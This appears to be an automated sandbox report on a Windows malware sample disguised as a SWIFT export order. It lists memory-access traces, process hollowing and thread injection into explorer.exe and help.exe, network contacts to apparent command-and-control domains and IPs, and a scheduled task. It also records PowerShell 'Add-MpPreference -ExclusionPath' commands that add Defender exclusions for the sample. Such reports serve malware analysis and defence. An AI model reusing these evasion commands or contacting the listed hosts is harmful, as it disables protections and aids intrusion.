          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03022073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03031074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03030EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03013D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03018DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03021C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0303740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.innovativepropsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.aarondecker.online
          Source: C:\Windows\explorer.exeDomain query: www.754711.com
          Source: C:\Windows\explorer.exeDomain query: www.pyjama-france.com
          Source: C:\Windows\explorer.exeDomain query: www.wamhsh.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.hpsaddlerock.com
          Source: C:\Windows\explorer.exeDomain query: www.blueharepress.com
          Source: C:\Windows\explorer.exeNetwork Connect: 156.226.250.165 80
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: D90000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3472
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: explorer.exe, 0000000B.00000000.271348735.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.274750515.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.308143289.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.303835455.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.290228388.00000000089FF000.00000004.00000001.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000B.00000000.327848027.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.266334576.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.297512128.0000000001128000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.280549209.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000B.00000000.328373843.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.267228079.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.281380700.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.299205343.0000000001640000.00000002.00020000.sdmp, help.exe, 00000014.00000002.508020541.0000000005560000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
